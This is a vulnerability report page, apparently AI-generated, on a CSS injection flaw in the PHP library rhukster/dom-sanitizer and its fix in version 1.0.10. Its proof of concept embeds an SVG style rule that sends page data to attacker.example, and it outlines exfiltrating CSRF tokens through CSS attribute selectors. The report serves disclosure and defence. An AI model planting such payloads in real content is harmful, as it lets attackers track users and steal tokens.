CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



GHSA-93VF-569F-22CQ

GHSA-93VF-569F-22CQ: CSS Injection in PHP rhukster/dom-sanitizer via SVG Style Tags

Amit Schendel
Amit Schendel
Senior Security Researcher

Apr 11, 2026·5 min read·41 visits

Executive Summary (TL;DR)

A CSS injection vulnerability exists in `rhukster/dom-sanitizer` < 1.0.10 due to missing validation on SVG `<style>` tag content, allowing data exfiltration via external resource requests.

The PHP package `rhukster/dom-sanitizer` prior to version 1.0.10 is vulnerable to CSS Injection. The sanitizer permits the inclusion of `<style>` tags within SVG documents but fails to inspect or neutralize the textual content within these elements. This oversight allows attackers to inject arbitrary CSS, facilitating information disclosure, user tracking, and potential exfiltration of sensitive DOM data via CSS selectors.

Vulnerability Overview

The PHP package rhukster/dom-sanitizer provides DOM-based HTML and SVG sanitization capabilities. Applications utilize this library to safely render user-supplied content by stripping dangerous tags and attributes before they reach the client browser. The library explicitly supports SVG processing, maintaining an allowlist of permitted SVG elements that includes the <style> tag.

A vulnerability identified as GHSA-93VF-569F-22CQ affects all versions of this package prior to 1.0.10. The core issue lies in how the sanitizer processes the permitted <style> elements within SVG inputs. While the element itself is allowed, the library fails to validate the textContent residing inside the tag.

This omission introduces a CSS Injection vulnerability mapped to CWE-74 and CWE-79. Because CSS rules can initiate network requests and conditionally execute based on DOM state, an attacker can embed malicious stylesheets within an otherwise benign SVG file. The sanitized output remains dangerous to the end user and executes within the context of the host application.

Root Cause Analysis

The vulnerability stems from an architectural oversight in the DOMSanitizer::sanitize() method. The method iterates through DOM elements and validates their tag names against a predefined allowlist. Once a tag is permitted, the sanitizer proceeds to inspect and filter the element's attributes to prevent JavaScript injection via event handlers like onload or onerror.

This attribute-focused sanitization strategy is insufficient for elements like <style>. In the Document Object Model, CSS rules are not stored as attributes but rather as text nodes (textContent or nodeValue) child to the <style> element. The sanitizer's logic entirely bypassed these text nodes.

Consequently, CSS directives such as @import and url() were never subjected to the EXTERNAL_URL patterns and attribute filters applied elsewhere in the library. The sanitizer assumed that stripping dangerous attributes from a permitted tag was sufficient to neutralize the element.

Code Analysis

Prior to version 1.0.10, the sanitize() loop strictly evaluated elements and attributes. The style tag passed the element allowlist check, and because the malicious payload resided in the textContent, the payload survived the sanitization process unmodified.

The fix implemented in commit 49a98046b708a4c92f754f5b0ef1720bb85142e2 introduces explicit validation for <style> tag content. The patch modifies the main element iteration loop to evaluate the textContent property when the tag name is style.

// Patched logic in src/DOMSanitizer.php
if ($tag_name_lower === 'style' && $this->hasDangerousStyleContent($element->textContent)) {
    $element->parentNode->removeChild($element);
    continue;
}

The newly introduced hasDangerousStyleContent method performs CSS hex decoding to prevent obfuscation bypasses, parsing escapes like \75 rl to url. It then applies strict regular expressions to block external stylesheet imports (@import\b), external URL references matching HTTP, FTP, or Data schemes, and legacy JavaScript execution (expression\s*\(). Internal fragment references like url(#gradient) remain permitted.

Exploitation

Exploitation requires the attacker to supply a crafted SVG file containing a malicious <style> block. The target application must process this SVG using DOMSanitizer::sanitize() and output the result into an active DOM context viewed by a victim.

The following proof-of-concept demonstrates the injection technique. The attacker embeds a wildcard CSS selector targeting all elements, coupled with a background property that initiates an external request.

$svg = '<svg xmlns="http://www.w3.org/2000/svg">
  <style>* { background: url(https://attacker.example/collect?url=victim-site); }</style>
</svg>';

When the victim's browser renders this sanitized SVG, it parses the CSS rules and automatically issues an HTTP GET request to the attacker's server. Advanced exploitation techniques utilize CSS attribute selectors (e.g., input[name="csrf"][value^="a"] { background: url(...) }) to exfiltrate sensitive data letter-by-letter.

Impact Assessment

The vulnerability carries a CVSS v3.1 base score of 4.7, reflecting a Medium severity level. The network-based attack vector allows remote exploitation without authentication, but requires user interaction to render the malicious SVG within a browser context.

The primary impact is limited to the Confidentiality metric. An attacker can disclose the victim's IP address, User-Agent, and exact page URL through basic tracking payloads. Using CSS attribute selectors, the attacker can exfiltrate sensitive DOM content, such as CSRF tokens or partial session identifiers, provided these secrets are present in the DOM hierarchy affected by the injected styles.

There is no impact on Integrity or Availability, as the vulnerability does not allow direct modification of the server state or disruption of service. The scope is marked as Changed (S:C) because the vulnerability originates in the PHP sanitizer but impacts the client-side browser environment.

Remediation

The vendor addressed the vulnerability in version 1.0.10. Organizations utilizing rhukster/dom-sanitizer must update their dependencies via Composer to implement the patch.

If immediate patching is not feasible, administrators can implement a temporary workaround by modifying the sanitizer's configuration. Developers should remove the style element from the allowed SVG tags array unless internal styling is strictly necessary for the application's functionality.

Applications implementing the patched version should monitor the library's updates, as CSS sanitization is inherently complex. Regular expression-based filtering may require further refinement if new CSS obfuscation techniques or browser-specific behaviors are discovered.

Official Patches

rhuksterOfficial 1.0.10 Release

Fix Analysis (1)

Technical Appendix

CVSS Score
4.7/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Affected Systems

rhukster/dom-sanitizer (PHP/Composer ecosystem)Applications utilizing rhukster/dom-sanitizer for SVG processing (e.g., Statamic CMS)

Affected Versions Detail

Product
Affected Versions
Fixed Version
rhukster/dom-sanitizer
rhukster
< 1.0.101.0.10
AttributeDetail
CWE IDCWE-79
Attack VectorNetwork
CVSS Score4.7 (Medium)
ImpactInformation Disclosure / CSS Injection
Exploit StatusPoC Available
KEV StatusNot Listed

MITRE ATT&CK Mapping

T1189Drive-by Compromise
Initial Access
T1048.003Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Exfiltration
CWE-79
Cross-site Scripting

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Known Exploits & Detection

GitHub Advisory DatabaseProof of concept demonstrating CSS injection via external URL request

Vulnerability Timeline

Vulnerability disclosed and published via GitHub Advisory Database
2026-04-10
Official fix commit merged and version 1.0.10 released
2026-04-10
Confirmed exploitable in Statamic CMS (GHSA-g8hv-8w5p-cvqg)
2026-04-10

References & Sources

  • [1]GitHub Advisory: GHSA-93VF-569F-22CQ
  • [2]Fix Commit 49a98046
  • [3]rhukster/dom-sanitizer Repository
Related Vulnerabilities
GHSA-g8hv-8w5p-cvqg

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•23 minutes ago•CVE-2026-105749
6.5

CVE-2026-105749: Unbounded Table Attributes in Docling Backends Leads to Resource Exhaustion

An uncontrolled resource consumption vulnerability exists in the Docling document conversion library. Maliciously structured HTML, JATS, ODS, or BoxNote inputs containing table cells with excessively large 'rowspan' or 'colspan' attribute values trigger algorithmic complexity conditions. This allows unauthenticated remote attackers to initiate resource exhaustion states, crashing or hanging the target document processing pipeline while bypassing configured timeouts.

Amit Schendel
Amit Schendel
1 views•6 min read
•about 1 hour ago•CVE-2026-105748
4.3

CVE-2026-105748: Local File Inclusion and Arbitrary File Disclosure in Docling Document Parser

A Local File Inclusion (LFI) and Arbitrary File Disclosure vulnerability exists in Docling and Docling Slim versions >= 2.16.0 up to 2.131.0. When parsing serialized DoclingDocument structures using the JSON input format, the backend fails to restrict image URI schemes, allowing remote attackers to retrieve local files and verify path existence on the host system during embedded document export.

Amit Schendel
Amit Schendel
5 views•5 min read
•about 2 hours ago•CVE-2026-105744
7.5

CVE-2026-105744: Arbitrary File Read and Remote Code Execution in Docling Tectonic Engine

Docling, a tool for parsing and processing diverse document formats, is vulnerable to arbitrary file read, arbitrary file write, and potential remote code execution (RCE) in versions 2.94.0 through 2.131.0. The vulnerability occurs when applications configure Docling to use the Tectonic engine for rendering TikZ diagrams into images. Because the compilation did not restrict hazardous TeX primitives or sandbox the environment, an attacker can supply crafted documents containing malicious TikZ definitions to access or modify local files and execute arbitrary commands under the privileges of the processing application.

Amit Schendel
Amit Schendel
6 views•7 min read
•about 3 hours ago•CVE-2026-105743
4.0

CVE-2026-105743: Server-Side Request Forgery Guard Bypass in Docling Document Conversion Engine

An SSRF guard bypass vulnerability in the Docling document conversion engine allows unauthenticated attackers to bypass internal IP access controls. The vulnerability exists due to a DNS rebinding Time-of-Check Time-of-Use (TOCTOU) condition, URL authority parsing inconsistencies, and unvalidated network requests triggered during headless browser page rendering.

Amit Schendel
Amit Schendel
6 views•6 min read
•about 4 hours ago•CVE-2026-105742
3.7

CVE-2026-105742: Sensitive Custom Header Leakage in Docling Image Resource Loader

A technical analysis of CVE-2026-105742 (GHSA-p3fw-7699-7926), a sensitive information disclosure vulnerability in the Docling document processing library. Vulnerable versions of Docling indiscriminately forward custom HTTP headers, such as authentication tokens, to arbitrary third-party origins and during cross-origin redirects while fetching remote image assets from untrusted HTML and EPUB documents.

Alon Barad
Alon Barad
6 views•6 min read
•about 5 hours ago•CVE-2026-106121
4.9

CVE-2026-106121: Denial of Service via Infinite Loop in RabbitMQ Java Client JSON Parser

CVE-2026-106121 is a Denial of Service (DoS) vulnerability in the RabbitMQ Java Client library (amqp-client) affecting versions prior to 5.37.0. The vulnerability resides in the legacy, custom JSON-RPC parsing class com.rabbitmq.tools.json.JSONReader. When parsing malformed or truncated payloads ending within a quoted string or single-line comment, the parser's scanner enters an infinite loop. This occurs because the loop lacks an exit condition for the end-of-input sentinel character returned by the iterator, leading to either CPU exhaustion or a JVM crash from an OutOfMemoryError.

Amit Schendel
Amit Schendel
8 views•6 min read